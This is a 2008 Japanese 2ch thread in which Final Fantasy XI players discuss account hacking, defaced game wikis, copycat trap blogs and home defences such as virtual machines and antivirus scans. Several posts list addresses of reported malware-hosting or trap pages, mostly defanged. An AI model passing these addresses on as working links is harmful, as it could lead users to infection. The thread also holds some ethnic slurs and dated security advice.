報道関係者向けのデジタルパブリッシングシステムを一時的に閉鎖しておりましたが、
復旧作業が終了いたしましたので、お知らせいたします。




603 :既にその名前は使われています:2008/04/13(日) 09:22:30.40 ID:JuJKWf22
最近どうなの?
少しは収まったのか

604 :既にその名前は使われています:2008/04/13(日) 09:50:01.35 ID:qHVhqrY3
また獣wiki狙ってんのか
最悪だな

605 :既にその名前は使われています:2008/04/13(日) 10:07:16.40 ID:LMMsWQq9
獣は9時57分に再度改竄されてる。

あそこも”更新日付を変更しない”がないからダメだ。
Wikiを更新するとRSSでそのお知らせが届く、当然獣はマークされてるから中華はRSSにもとどく
つまり根本的対策しない限りは延々いたちごっこ。
このオプションがある場合、チェックして直せばお知らせは届かない。

もうそういうWiki(一般対策+更新日付オプション付き)じゃないと危ないね。


606 :既にその名前は使われています:2008/04/13(日) 10:27:32.77 ID:iiOEze0f
>>605
FFに関係ないWiKiでもいたちごっこやってるんだわ。
そっちは日付変更変更しないオプションあるけど

607 :既にその名前は使われています:2008/04/13(日) 10:31:32.01 ID:LMMsWQq9
基本的な対策(編集制限)してないからだよ、きっとね。
その上でそのオプションを使わないと。
普通に更新オプション使っても改竄されるのを遅らせる程度の効果しかない。

そういうのが嫌なら結局はwikiwikiに行くとかまとめサイト(HP化)にするくらい?
wikiwikiは原則国外IPブロックしているからな。


608 :ボロ鯖より:2008/04/13(日) 10:39:35.23 ID:tnpGL8ou
アカハック被害者の持ち物かもしれない怪しいバザーキャラ報告
Weuit

冒険者見習いでサンド所属タルでランク1。?マーク出したまま。
バザー品(確認前に売れてた分は不明)
バルカンスタッフ、マハトマ脚、ジェットサラウィル、ソニックベルト、マリンMブーツ
アクアリング、ギガントマント、エレメンタルトルク、モリオン耳+1、麒麟大袖、ホーバージョン
雲次、イギララッパ、教経の篭手、雲生、オーシャンロープ、スノーリング2個
マハトマピガッシュ、チェビオットケープ、オーシャンサッシュ、闊大の外套

合成品は銘無しです。

609 :既にその名前は使われています:2008/04/13(日) 10:41:16.35 ID:iiOEze0f
spam_filter.phpじゃFCもsurparaもスルーだし(もともとは普通のサイトだし)
そこを設定加えられるのが管理人だけだから、居ないとどうしようもない。

610 :608:2008/04/13(日) 10:56:24.76 ID:tnpGL8ou
バザキャラ、Weiutだった。
キリジ+1は売れたようだ。
Weiutは、現在ログアウトしてます。数名からGMコールしているぽい。

611 :既にその名前は使われています:2008/04/13(日) 12:25:55.39 ID:hkN8j19b
>>608
いかにも忍者と黒やってたヒュームの持ち物だな…

612 :既にその名前は使われています:2008/04/13(日) 13:04:34.20 ID:a/f2UTEp
>>608
報告おつかれちゃん。こういう地道報告はいい事やね

それにしてもGW明けには、指針発表欲しいね。
今はSTT含め、どの会社の社員も海外旅行で上の空やねw
私の会社は関西圏やけど、同僚と今年何故か九州温泉旅行が被ってるんよw

613 :既にその名前は使われています:2008/04/13(日) 13:58:51.32 ID:RofMaE6j
>>608
それはこっち
ttp://c.2ch.net/test/ogame/1207965577/
のほうがいいかもしれん。
もしくは鯖板。
それにしても、相変わらず取られても対応しないな■は。

614 :既にその名前は使われています:2008/04/13(日) 15:45:20.56 ID:B7g1Ta3O
>>613
せつこそれ携帯用のアドレスや
【Free】RMT業者を通報しまくれ ver.12【Tibet】
http://live27.2ch.net/test/read.cgi/ogame/1207965577/

615 :既にその名前は使われています:2008/04/13(日) 17:54:10.17 ID:7Y5mX2E+
保守

616 :既にその名前は使われています:2008/04/13(日) 19:03:06.10 ID:+miKfWdr
ログインしようとしたら「パスワードが違います」
おかしいなと思い一字一字確認しながら入れたが「パスワードが違います」
3回目入力したら「3回パスワードを間違えたのでロックされます」
俺オワタ\(^o^)/

オンラインスキャンの準備をしながら
諦めきれなくてフレンドリストプラスから入力を試みた

ここでCapsLockキー入ってたことに気付いた\(^o^)/
解除して入力したらログインできた。グッジョブ俺

617 :既にその名前は使われています:2008/04/13(日) 19:16:15.60 ID:oFLF6Qj8
よかったなwwwwwwww

618 :既にその名前は使われています:2008/04/13(日) 19:21:11.56 ID:coStnFFB
これほどの緊張感を味わえるMMOがほかにあっただろうか

619 :既にその名前は使われています:2008/04/13(日) 19:28:52.95 ID:hkN8j19b
ログイン時にドキドキできるゲームはファイナルファンタジー11だけ!!

620 :既にその名前は使われています:2008/04/13(日) 20:15:48.13 ID:FjxGB93r
>>616
これ使ってCapslock無効にしとけwww
ttp://www.vector.co.jp/soft/winnt/util/se220597.html

621 :既にその名前は使われています:2008/04/13(日) 20:23:50.71 ID:PHBth6Lf
たった今垢ハックされたのに気づいた・・・
ここでCapsLockキー入っていなく、これはもうああ・・・


622 : ◆eC/98Piv8s :2008/04/13(日) 20:25:30.94 ID:FMu6Tr51
ちょっと似た問題だと思うので張っておく。

┏━┓────────────────────────────────
┃━┓  【 重要 】 Gポイント ログインパスワード変更のお願い
┗━┛────────────────────────────────

 日ごろはGポイントをご利用いただきまして、誠にありがとうございます。

 Gポイントでは、会員様にご登録頂いている個人情報の管理に万全を期して
 おりますが、より安全にサービスをご利用頂く為に、パスワードを会員様
 ご自身で適切かつ厳重に管理頂くようお願いいたしております。

 最近、第三者が何らかの手段でログインに必要なID及びパスワードを入手し、
 なりすましでログインを行い、保有ポイントを交換したというケースが報告
 されています。


623 :既にその名前は使われています:2008/04/13(日) 20:26:12.29 ID:FMu6Tr51

 そのような事態を回避するためにも、定期的なパスワードのご変更をお願い
 致します。            ~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 わかり易いパスワードを設定しておりますと、思わぬトラブルに繋がる可能性が
 ございますので、次の点にご留意の上、パスワードの変更を行って頂くことを
 お願い致します。

624 :既にその名前は使われています:2008/04/13(日) 20:27:28.76 ID:FMu6Tr51
もう、ゲームのアカウントハックだけじゃなくなってるんだなということで。

625 :既にその名前は使われています:2008/04/13(日) 20:38:35.86 ID:UL7y157f
スレ違い。アフィ厨死ね

626 :既にその名前は使われています:2008/04/13(日) 21:06:52.53 ID:93oB8DtY
FFだけでハッキングが活性化してるわけじゃないみたいね
どうも、ロシア系と中国系のハカーが手を組んで悪さしてるとか?
追跡したらロシア系ハカーが中国に拠点移したとか分かってるのに手をだせないのかの

627 :既にその名前は使われています:2008/04/13(日) 21:09:02.51 ID:zYu3ZICc
ロシア本国だと稀に外面気にするが中国は金が全てなので国が取り締まる意思が
無い。

628 :既にその名前は使われています:2008/04/13(日) 21:30:10.59 ID:ej5RHxll
しょーもねーことであっさり死刑とかなんのにな

629 :既にその名前は使われています:2008/04/13(日) 21:36:17.33 ID:1gTTVF0P
足があるものは親と家具以外食うとかどんだけー



って子供が食わないものに含まれてないのが中国の恐ろしいところ

630 :既にその名前は使われています:2008/04/13(日) 21:42:28.52 ID:ONLlMn5T
中国はこういう国だしな・・・
ttp://www.geocities.jp/my_souko/

のび〜る久々に見に行ったらこんなサイトになってて思わず読んでしまったよ

631 :既にその名前は使われています:2008/04/13(日) 22:06:33.09 ID:ltWE1GC5
>>626
スキル的に最凶なのがRBN(RussianBusinessNetwork)で、
ここはハッキングのみならずツール(Mpackなど)の販売
(ハッカーが買う)で他の追随を許さない。
最近ロシア当局の厳しい追及を逃れ中国に拠点を移した模様。
RBNの連中もシベリアで木を数える仕事はしたくないようだ。

632 :既にその名前は使われています:2008/04/13(日) 22:11:06.63 ID:FjxGB93r
FFやってないけど、このスレは参考になるわ

633 :既にその名前は使われています:2008/04/13(日) 22:31:18.11 ID:qfTCP2ZJ
さっきR0になって落ちたから、まじ冷や汗掻いたわ・・・。
モデムのライトが消灯してたから回線の問題だろうけど、
昔はそんなこと思わなかったのにな〜。

634 :既にその名前は使われています:2008/04/13(日) 22:38:18.63 ID:hkN8j19b
>>621
状況は?
複垢持ってる?

635 :既にその名前は使われています:2008/04/13(日) 23:54:03.48 ID:dGiG4sLm
パスワードの変更ってどうやるの?
ログインパスワードじゃないよね?
プレイオンラインパスワードの変更がどこでできるかわかりません;教えてエロ兄貴

636 :既にその名前は使われています:2008/04/14(月) 00:01:17.88 ID:B7g1Ta3O
>>635
>>560
安心できる環境から変えるんだよ

637 :既にその名前は使われています:2008/04/14(月) 01:26:41.83 ID:rUOBAaDS
hxxp://yaplog.jp/sinya/

インラインフレームで中華の白紙サイトが組み込まれてる。FC2以外も注意ね

638 :既にその名前は使われています:2008/04/14(月) 01:28:31.99 ID:rUOBAaDS

きまぐれ☆ねこのFFXI日記

639 :既にその名前は使われています:2008/04/14(月) 01:33:05.89 ID:iCTDrp/C
>633
他からログインされて落とされる場合その旨のメッセージ出るから落ち着けw

640 :既にその名前は使われています:2008/04/14(月) 01:47:45.91 ID:TotyqCRj
>>637-638
一般のFF関連ブログさんが改竄されたの?それともコピペで作った罠サイト?

641 :既にその名前は使われています:2008/04/14(月) 02:18:52.87 ID:1rLw8QCW
あげ

642 :既にその名前は使われています:2008/04/14(月) 02:33:11.66 ID:TMZTtC52
PeerGuardian21入れたけどごくまれに
エラーで全画面モードを失いました、って
FF落とされるね

常に最小化で実行とかもチェック入れてるんだけど・・・



643 :既にその名前は使われています:2008/04/14(月) 03:21:11.04 ID:Z2BDn3lX
オンラインゲーム系のサイト見てなくても他は見てる人たち。

電話・・・
 おかあちゃん「あんた、なにこんなにつかってるのよ!」
 あほなこども「あ、なに?」
 おかあちゃん「今月請求が50万円よ?」
 あほなこども「はあ?けたみまちがってるhんじゃね?」
お父ちゃん登場
 おとうちゃん「家族カード契約破棄するからな」
 あほなこども「え?? おとうちゃんまってよ」

電話 つーつーつー

644 :既にその名前は使われています:2008/04/14(月) 03:24:27.56 ID:reWCCcsE
>>637-638
改竄ではなく実際あるサイトさんのblog名を使って作った所だね。
元サイトさんはfc2からシノビに移ったばっかのとこ。
罠blogの記事は1つのみ。

blog名で検索するとヤブログでもう1つ同じblog名で作った罠blogがあった。
hxxp■//yaplog■jp/Rimlia/
しかもこのblog名&URLで移転しましたって書き込みを色んな所でしてるぽい。

たしかヤプログで同じように元サイトあるblog名つかった罠blogがあったはず。
そこはもう消えたみたいだけど、コピペ罠blogはヤプログで作ってるのかねぇ。

645 :既にその名前は使われています:2008/04/14(月) 04:29:10.11 ID:MWQlg2m+
獣Wikiのソロ狩場レベル帯リンクでhxxp://blog2.surpara.com/noushaa/踏んでしまった。
あきらかに獣とは関係なさそうな絵が出てきた瞬間にIE落として
飛ぶ寸前のページまで戻ってページ下見たらワーム検出という書き込み。

約1年更新していないうちのノートンは反応無し。
Windows updateはIE7インストールの選択だけで放置。
(自動更新+たまに手動で更新していた。)
とりあえずすぐPS2に切り替えてPOLパスワード変更。
怖くてPOLログインした状態からPS2落せない。

こんな状況になったんで久しぶりにアンチウィルス買ってこようと思うのですが
ブラウザとFFやるだけのPCには何がお勧めでしょうか?

646 :既にその名前は使われています:2008/04/14(月) 04:31:40.74 ID:oe4MoUW3
>約1年更新していないうちのノートンは反応無し。
>Windows updateはIE7インストールの選択だけで放置。
こういう人は他のユーザーに迷惑かけるからPC捨てるのお勧め
マジで

647 :既にその名前は使われています:2008/04/14(月) 04:32:56.58 ID:SOL9y6/J
>>645
1年更新してないような人にはどんなアンチウィルス勧めても意味無いな。

とかいう煽りが付くのは避けられない。

648 :既にその名前は使われています:2008/04/14(月) 04:42:51.20 ID:Gu6mWMds
>>645
PS2もしくはXBOXをお勧めします。

649 :既にその名前は使われています:2008/04/14(月) 04:46:57.15 ID:SOL9y6/J
ソースチェッカーで見たところ、だいぶ怪しいな。ってか獣wikiはURL変更争い中だしな。
とりあえずカスペのオンラインスキャンをやって、検出されたら試用版を落として見つかったの削除。

何も見つからなくて安心出来るならブラウザ変更、ウィルスソフトは好きなの使え。
見つからなくて安心出来ないなら、HDフォーマットしてウィンドウズ入れなおせ
でもおまいさんはやっぱりPS2でやった方が良いとおもう。アンチウィルス買ったって更新しないと意味ないんだぜ

650 :既にその名前は使われています:2008/04/14(月) 04:59:44.66 ID:/pRlFfQE
>>642
アップデートだろjk

651 :既にその名前は使われています:2008/04/14(月) 07:41:53.87 ID:+BRvAlCX
アンチウイルス買う前にHDDフォーマットしなおしてOS再インスコが一番いいとおもふ。
んで、テンプレのPG2導入とカスペ。

652 :既にその名前は使われています:2008/04/14(月) 07:53:57.70 ID:21LcaDsA
新しくアンチウィルス買ってもすぐ更新しなくなりそうな予感がするよ。
のどもとすぎればなんとやらで…
素直にFFはPS2のみがいいと思う。

653 :既にその名前は使われています:2008/04/14(月) 09:02:31.80 ID:C3WAr2LX
啓蒙保守

654 :既にその名前は使われています:2008/04/14(月) 09:38:45.94 ID:SbwPscM7
>>645
ログインしっぱなしでも、パス割れたらお前が落とされるぞ。
後からインした方が強いっての、直してくれねえかな……。
この仕様おかしいと思うんだが。

655 :既にその名前は使われています:2008/04/14(月) 09:46:48.20 ID:KM5ZFr9j
>>654
回線切断対策なんだろうけど・・・
携帯とかからアカウントロック/解除できれば
事前防御&万一ハック受けたときにも安心なんだが。

656 :既にその名前は使われています:2008/04/14(月) 09:55:30.55 ID:Xg5EOeMS
>>654
別におかしくないだろ。
「後からログイン不可」なんて仕様にしたら、先に業者にログインした場合、
こっちが入れなくなるわけだし。

657 :既にその名前は使われています:2008/04/14(月) 10:15:50.71 ID:Vk3fVUc4
>>656
ログイン合戦の後、垢ハク側が勝ってしまうと結局正規プレイヤーが入れなくなる
から、後からインした方が強いのは直して、かつ乗っ取られた場合は即垢凍結
できる手段を実装するのがまだマシな仕様だと思う。

658 :既にその名前は使われています:2008/04/14(月) 10:33:38.98 ID:EH6jfC5O
市販のアンチウイルスソフトを1年も更新しないのなら、無料のアンチウイルスソフトを入れておいた方が100倍マシだぞ

659 :既にその名前は使われています:2008/04/14(月) 10:40:38.11 ID:Xg5EOeMS
>>657
>即垢凍結できる手段を実装する
これを実装すれば済むことだろ。

後ログイン「可」だったら、ゲーム中に落とされた場合に「怪しい」ってことに
気付くけど、後ログイン「不可」だったら、アイテムとかギルが減って、
被害にあうまで、垢ハックされたことに気付かないと思う。

660 :既にその名前は使われています:2008/04/14(月) 10:40:57.97 ID:KM5ZFr9j
大抵のソフトは定期的に自動でシグネチャ更新するんじゃないの?
ライセンス切れたとき買い換え更新しないことをいってる?

661 :既にその名前は使われています:2008/04/14(月) 11:13:32.07 ID:Vk3fVUc4
>>659
確かにその通りなんだけど、逆に考えると、後ログイン「可」の今のままだと
普通にログインしたとき、アイテムとかギルが減っているのに気付くまで
垢ハックされたことに気付かないって事になるよ。

662 :既にその名前は使われています:2008/04/14(月) 11:33:13.96 ID:OyMQTLOc
>>658
無料でもパターンファイルを更新しなきゃ(ry

663 :既にその名前は使われています:2008/04/14(月) 11:37:43.39 ID:OMLP5RT5
ttp://www.vmware.com/jp/products/player/
これ使ってネットおすすめ

664 :既にその名前は使われています:2008/04/14(月) 11:48:22.66 ID:8jfTcsTx
>>661
そのためにログイン時間が出るようになってる。
向こうも解るようにしてるしな。

…なに?そんなのいちいち見てないって?
大丈夫だ。俺もみてないw
ただ、これからは見るようにくせつけた方がいいだろーなー。

665 :既にその名前は使われています:2008/04/14(月) 12:04:03.21 ID:mrPCKw2D
ギコナビだと、踏まなきゃ良いのだがHxxp://〜〜でもリンクされてしまからなぁ。
ブラウザはFirefoxに変えたが、2chブラウザも非IEエンジンの他のにするべきか・・

666 :既にその名前は使われています:2008/04/14(月) 12:22:59.24 ID:vgN340PY
ハッキンgoo

667 :既にその名前は使われています:2008/04/14(月) 12:28:51.35 ID:eYSVUnLi
>>665
というか、ここの住人ともあろろうに変えてないよかよっw

668 :既にその名前は使われています:2008/04/14(月) 13:45:45.46 ID:Vk3fVUc4
>>665
昨日、OpenJane DoeからJaneDoe Viewに変えたけど連鎖あぼーんとか
便利ですねぇ。

669 :既にその名前は使われています:2008/04/14(月) 14:32:50.78 ID:h3E2D1rt
>>665
ギコナビから踏んだときに、開くブラウザはFirefoxにしてあるけど。一応。

670 :665:2008/04/14(月) 14:41:04.64 ID:mrPCKw2D
Jane Doe Styleは非IEエンジンらしいね。いまそれ落として書き込み。
ギコナビと比べて機能が多すぎるw

671 :既にその名前は使われています:2008/04/14(月) 14:46:15.65 ID:Ol8ydhlg
>>645

これと同じURLが
Wikiのエースヘルム落とすNMのページに載ってた。

King V(失念…)の攻略欄にある侍のリンクが
「 →侍 」となっていてaguseでチェックしたらアニメ関連のページが表示された。

672 :既にその名前は使われています:2008/04/14(月) 16:00:22.89 ID:0+bxWIvQ
>>670
非IEエンジンで軽いっての見てずっとJane Doe Style
2ch形式の他鯖の板登録したり、見たいところだけお気に入りに移してみれるから結構楽

673 :既にその名前は使われています:2008/04/14(月) 16:01:17.37 ID:HSqy0VcT
そーいや、バンダイビジュアルが改竄されたらしーから、それか?

674 :既にその名前は使われています:2008/04/14(月) 16:03:43.02 ID:F3NUeuxU
そういえば、FFやってないリアフレが
「戦場の絆のwiki見に行ったら、リンク先がことごとくmixiの女子高生の日記になってたw」
とかメールしてきたんでカスペのオンラインスキャナ薦めといた。

最近はそんなとこまで進出してんのか、支那業者は。

675 :既にその名前は使われています:2008/04/14(月) 16:08:22.19 ID:0+bxWIvQ
>>674
wikiでゲーム関連なら見境なく張ってそうだな

676 :既にその名前は使われています:2008/04/14(月) 16:15:49.62 ID:HqYVml7Z
>>674
mixiクラックは結構前。
Wiki⇒mixi⇒罠サイト 
が流行りだしたって事かな?

677 :既にその名前は使われています:2008/04/14(月) 16:35:48.06 ID:YP0LUVEW
即垢締結出来るパスを今度は抜かれる!


678 :既にその名前は使われています:2008/04/14(月) 17:28:01.00 ID:iCTDrp/C
うちの鯖のブログ持ちが、
FFで「アカウントハックされた」と騒いでるんだが
自分のブログの閲覧者には何にも警告とかはない。
まだハックの大まかな手法が解明されてなかった頃ならともかく、
これだけ騒がれててもまだハックされるようなら
セキュリティに対する意識がちょっと甘いと思う。
自分のブログ改ざんや偽コメントURLとかにも無頓着だろうなと思った。
鯖のブロガーリンクみたいなとこにまだリンクのこしてるし。

679 :既にその名前は使われています:2008/04/14(月) 17:30:00.64 ID:F2+1ci6P
管理放棄状態の職Wikiは、有志で避難所ミラーでも立ち上げて、そこに誘導するようにしたほうが良くないか。
繰り返し改竄と修復を繰り返しても、大陸の連中は人海戦術とツールでごり押ししてくるから、こちら側が疲弊するだけだ。

FFに限らず、他のMMO関連Wikiでも、建て直しの例は少なくない。
それと、現在管理人の立場にある場合も、メンテナとしての余裕が無くなる見込みがあったりする場合は、早めに後継を募るなり、
複数管理人による連繋、各Wiki間でのセキュリティノウハウの共有なども検討した方が良いかと思われ。

680 :既にその名前は使われています:2008/04/14(月) 19:21:50.16 ID:pdLAW/UP
したらばもダメか
jbbs■livedoor■jp/game/43914/
ぱっと見どこかの鯖板、しかし中国へのリンクが3つくらい隠れてた。

681 :既にその名前は使われています:2008/04/14(月) 19:33:04.63 ID:HqYVml7Z
夕食食べながら上げ

682 :既にその名前は使われています:2008/04/14(月) 19:35:37.78 ID:AmTB0PGK
サーパラ、公式のサポートblogの今日付けの記事でiframe対策について触れてるね。

tp://blog.surpara.com/staffblog/archive/2008/04/48875.html

>IFRAMEタグを利用した不正なブログの作成が行われる状況が
>発生しているため、一時的にIFRAMEタグがご利用頂けない状態
>となっております(既に作成済みの文書には影響しません)。
>こちらの改修により、IFRAMEタグ及びそれに囲まれた範囲の
>文書は確認画面の段階で消去されます。

ただ問題は
>(既に作成済みの文書には影響しません)
ってことなので、既存の罠まではまだ手が回ってないってことだから、
もう少し注意喚起しておいたほうがいいかも知れない。


683 :既にその名前は使われています:2008/04/14(月) 19:50:49.85 ID:x3vSN0mK
先の大規模改ざんから久々に来たけど
全然沈静化してないのか・・・。

もうどのサイトも不安で見れない(´・ω・`)

684 :既にその名前は使われています:2008/04/14(月) 20:00:21.69 ID:wkJwzhSW
悪いことは言わん FF専用PC作れ。 コレでマジ安全。

685 :既にその名前は使われています:2008/04/14(月) 20:05:13.75 ID:Ws3qqmgW
>>683
>>684の言うとおりだ、スクエニに何とかする様にクレーム入れつつ自衛をすべき。

一見スクエニに非はない様に見えるし実際そうだとも言えるがFF11ユーザーという団体の声として
スクエニが各種企業・関係省庁に伝えてくれるからとりあえずスクエニに不満をぶつけるべき。

686 :既にその名前は使われています:2008/04/14(月) 20:23:38.39 ID:Vk3fVUc4
FF専用PC作るのも一つの手だけど、>>663のVMwareってのはどうなんでしょ?
実際に使ってみた人の話とか聴いてみたいなあ。

687 :既にその名前は使われています:2008/04/14(月) 20:28:55.63 ID:MoOtPdMX
VMでFF動かす気ですか

688 :既にその名前は使われています:2008/04/14(月) 20:52:47.47 ID:Vk3fVUc4
逆です。
ホストでFF、ゲストでネット閲覧です…。

689 :既にその名前は使われています:2008/04/14(月) 20:53:51.56 ID:IynybN04
オンラインゲーム以外のインターネット環境を仮想環境に移すってどうなんだろうなぁ…
なんかめんどくさそう…
逆は無理www

690 :既にその名前は使われています:2008/04/14(月) 20:57:54.40 ID:IynybN04
>>688
とりあえずメモリが必要になるな
仮想OSとその上で動くためのメモリを余分に使うことになる
メモリに余裕あるなら試してみるといいかも
俺はメインと仮想環境のデータのやり取りめんどくさくてやりたくないw

691 :既にその名前は使われています:2008/04/14(月) 21:02:19.49 ID:Xg5EOeMS
>>684
FF専用PC作れば、垢ハックされる確立は、下がるだろうけど、
結局、WEB巡回するPCは、セキュリティ対策する必要があるよな。
FF専用PC作ったところで、問題を横流ししてるだけだと思う。

692 :690:2008/04/14(月) 21:06:02.18 ID:IynybN04
すまん
×仮想OSとその上で動くためのメモリを余分に使うことになる
○仮想OSとその上で動くソフトためのメモリを余分に使うことになる

693 :既にその名前は使われています:2008/04/14(月) 21:30:39.69 ID:gIFhYxY4
俺はデュアルブートでWindows/Linux。
ネトゲとブログ書くときだけしかWindowsに降りないんで。


694 :既にその名前は使われています:2008/04/14(月) 21:31:57.24 ID:OMLP5RT5
>>686
ネット、メールだけってんなら256でもいいとおもう、多分。
メモリ3G積んでるんで、あまりメモり気にした事無いんだ、ちょっと必要なメモリがどれ位はわからん。
デスクトップ同士でドラッグアンドドロップ出来るから、ファイルのやり取りは特に苦労は無くて
別のパーティションとか、フォルダにコピーする感じでファイル移動する。
セキュリティ的に問題が出るかもだけど、共有フォルダも作れる、が漏れは怖いから作ってない。
仮想環境に移すのはブラウザのブックマークとメールのデータとか位だし、
そんなのドラッグアンドドロップでコピーしてしまえば良い。
そもそもそんなにメインと仮想のデータのやり取りなんかしないけどなー

ttp://fumhum.blog71.fc2.com/blog-category-8.html
ここみて設定すれば多分誰でも設定出来ると思う。
でもfc2だから気をつけてね。

695 :既にその名前は使われています:2008/04/14(月) 21:36:20.71 ID:gIFhYxY4
>>680の罠したらば凍結確認、事実上死亡だな。
ゴルァ送ってよかったぜ。
しかしすぐに別IDで罠を作るだろうな、抜本的対策がない限りは。


696 :既にその名前は使われています:2008/04/14(月) 21:47:44.03 ID:IynybN04
>>694
XPで各セキュリティソフト入れたら256MBじゃ足りないよ
ビデオメモリにもメモリを割り当てるから、実際はもっとメモリを消費する

697 :既にその名前は使われています:2008/04/14(月) 22:04:26.51 ID:OMLP5RT5
まぁ使ってるメモリの種類にも因るけど特に今はメモリなんて大した値段じゃないし、
足りなきゃ増設すりゃいいんじゃないかな。
セキュリティソフトっつってもAVAST!位しかいれてないな、メモリそんな食ってんだろうか?
メインの方にはそれとPG2かな。
VMは無料だし、なんせOSいれ直しを考える様なウィルスに掛かっても仮想内で完結するし、
なにより巻き戻せるのがいい、唯一欠点はライセンスが余分に一つ要る事だな。
それでもPCもう一個用意するよりは金も掛からねーしめんどくさく無いと思う。

698 :既にその名前は使われています:2008/04/14(月) 23:33:52.53 ID:Vk3fVUc4
>>仮想環境についてレスくれた方々
とりあえずメモリもライセンスもなんとかなるので面倒くさがらなければ、
垢ハック対策としての仮想環境というのも一つの手段としてアリかも
知れないと思いました。
やる気が起こればちょっと色々勉強してみます。ありがとうございました。

699 :既にその名前は使われています:2008/04/15(火) 00:12:46.04 ID:PGHiOWbE
メモリもライセンスもなんとかなるなら導入するのが一番いいんじゃね?
ほぼ鉄壁の対策だろ

700 :既にその名前は使われています:2008/04/15(火) 01:16:03.44 ID:TGg4xKaM
PG2落とせなくなってる・・・俺だけなんだろうか

701 :既にその名前は使われています:2008/04/15(火) 01:49:59.72 ID:9j0fZmN6
>>700
今、英語、日本語サイトで確認してみたけど、落とせたよ。

702 :既にその名前は使われています:2008/04/15(火) 03:40:36.29 ID:YA4QK7Mn
VMware うんぬん言ってる方たち分かってる?ハードウェア以外で。

必須
・ホストOS上の各ソフトのライセンス ←まぁこれは今あるOSだろうから大丈夫か?
・ゲストOS上での各ソフトのライセンス

ホストWindows(既存)でゲストをWindowsにする場合、ゲスト用Windowsライセンスが必要。
VMware player は、かなり機能限定だから気に入ったら使って。

あと、ちゃんと設定しないとゲストOSで被爆⇒ホストOSに感染
という流れもあるので安心しないでください。


703 :既にその名前は使われています:2008/04/15(火) 04:43:32.14 ID:7//UMjui
      ,,--´ ̄~`-、,,
   ,,-メ/怨/ 死 死怨ヽ、
  /// 死レヽ、怨ノヽ死 イ`ヽ
  || |イノ怨● `死´__呪ノノ死ヽノオ|  私はOdinのEnneneですことよ!wwwwwwwwww
  ヽ⌒|呪´ ▲ ´釘`/ ノ|  |  
  ソソ`/死ヽ,-フ 死 ノリ怨´死>  
    _\○) >死_呪-;リ´死´ノノ
   <死ヽ//死ノ_,,-怨ヽ '' ''’’ レベル上げで無言で回線抜きをしますことよ!wwwwwww
   /|ノ呪ヽ\死ヽY死|
  (/死_人死 `ー呪-´
   ヽ、|´||怨`┬´ヽ パーティの迷惑?しったこっちゃないですわよ!wwwwwwwwwwwwww
   /<| 怨. 死 ヽ  `ヽ

704 :既にその名前は使われています:2008/04/15(火) 04:53:45.20 ID:2f78jD7r
680踏んだんだけどFirefox(最新)だったしまぁ大丈夫だと思う
いや、思いたいw

数年前にVirtualPCでネット環境専用環境作った事あるけど、
ブックマークとかメールデータが面倒で結局やめちゃったんだよなぁ
今ならGoogleでブックマークもメールデータも管理出来るし、
もう一度ネット専用環境でも作るか

705 :既にその名前は使われています:2008/04/15(火) 05:34:53.87 ID:OdvkRNEa
>>704
数年前がいつなのかわからんけど、
現状のVirtualPCでも多分一緒


結局、
同一PCで同じ回線使っていたら意味は半減以下
知識+資金があれば蜜壺作って回収するくらい。




706 :既にその名前は使われています:2008/04/15(火) 05:49:12.35 ID:HjVHGZ1z
仮想環境でストレス感じないためには直の環境よりいいハードが欲しい。
強化の程度にもよるが、下手したら安マシン2台とかわらなくなることも

707 :既にその名前は使われています:2008/04/15(火) 05:50:17.27 ID:HjVHGZ1z
費用の話ね

708 :既にその名前は使われています:2008/04/15(火) 05:51:58.03 ID:2f78jD7r
>>705
未知のウィルスにはどのソフト使ったって対応できんのだから
確実に安全ってのは無理なのは承知だな

ただウェブやメールの読み書きくらいLinuxでやれば
垢ハックの主なターゲットがWindowsである以上リスクは減るよね

というか、IDとパスワードを簡単に解析(ほぼ生w)出来るように
放置してる■が一番の問題だよw

709 :既にその名前は使われています:2008/04/15(火) 07:12:58.00 ID:KLr3gfsG
RMT

710 :既にその名前は使われています:2008/04/15(火) 08:22:48.34 ID:UZRbXkrH
だめぜったい!

711 :既にその名前は使われています:2008/04/15(火) 09:35:32.51 ID:bSw5rb6G
あげ

712 :既にその名前は使われています:2008/04/15(火) 11:51:39.16 ID:+zl63Zka
とりあえず、せっかくだからageておくぜ

713 :既にその名前は使われています:2008/04/15(火) 12:21:45.87 ID:5LDmuRnj
家族のFFマシンでログインしようとしたらパスワードが空白になってるんだけど、
これってまさかキーロガータイプのスパイウェア食らったかな?

ちょっと何も入力せずに調べてみる。

714 :713:2008/04/15(火) 12:25:37.87 ID:5LDmuRnj
一応、セキュリティ高めまくった別のマシンでログインしてみたら、
アカウント自体は無事みたい。

やっぱ家族マシンは鬼門だな。
一応ウィルスとスパイウェアスキャンしてくるわ。

715 :既にその名前は使われています:2008/04/15(火) 12:37:48.99 ID:wfEDDxhO
>>713
単にパスワード保存を止めただけじゃ・・・?
POLにパスワード残しておくほうが危険だと思うが。

716 :既にその名前は使われています:2008/04/15(火) 12:39:48.05 ID:kwl1i0EO
うちはパスワード保存する設定にしてるPCとしてないPCがある。
保存する設定のPCではパスワード欄に*が表示されるし
保存しない設定のPCではパスワード欄は空白。

その家族のFFマシンのパスワード保存の設定を確認してみるべし。

717 :713:2008/04/15(火) 12:40:08.98 ID:5LDmuRnj
>>715
その可能性もあるけど、念のため。

718 :既にその名前は使われています:2008/04/15(火) 12:40:49.66 ID:KP/YXZcT
>>713
ネットにつながってない状態でPOL起動したらそうなった

719 :713:2008/04/15(火) 12:44:40.29 ID:5LDmuRnj
家族はもう殆どやってないので前回俺が繋いだときは普通に保存されていることを確認した。
4月の頭だったかな?

最終ログインもその日時になっていたからな。

ただ、それ以降一切FFは立ち上げていないのにパスワードが消去されていた
ってのがさっきあって、それで一応ログインせずウィルススキャンとスパイウェアスキャンを
実行中

720 :既にその名前は使われています:2008/04/15(火) 12:55:37.76 ID:yb0K4sMS
>>719
他のPCでアクセスしたときパスワード変えたか?すぐ変えとけ

721 :713:2008/04/15(火) 13:02:35.56 ID:5LDmuRnj
>>720
今、■eの登録サーバが15時までメンテ中で何もできんw

722 :既にその名前は使われています:2008/04/15(火) 13:13:03.11 ID:4dueYhlh
ttp://www.playonline.com/ff11/polnews/news13142.shtml
下記日時におきまして、プレイオンラインビューアーのバージョンアップを実施いたしました。
日 時:2008年4月15日(火) 9:00頃
対 象:プレイオンラインビューアーをご利用のお客様
【主な変更内容】
■内部仕様の一部を変更しました。
 ※本バージョンアップは各種機能・画面などには一切影響
  しません。

これでログイン関係がちょっとでもよくなるといいのだが・・・

723 :713:2008/04/15(火) 13:19:08.51 ID:5LDmuRnj
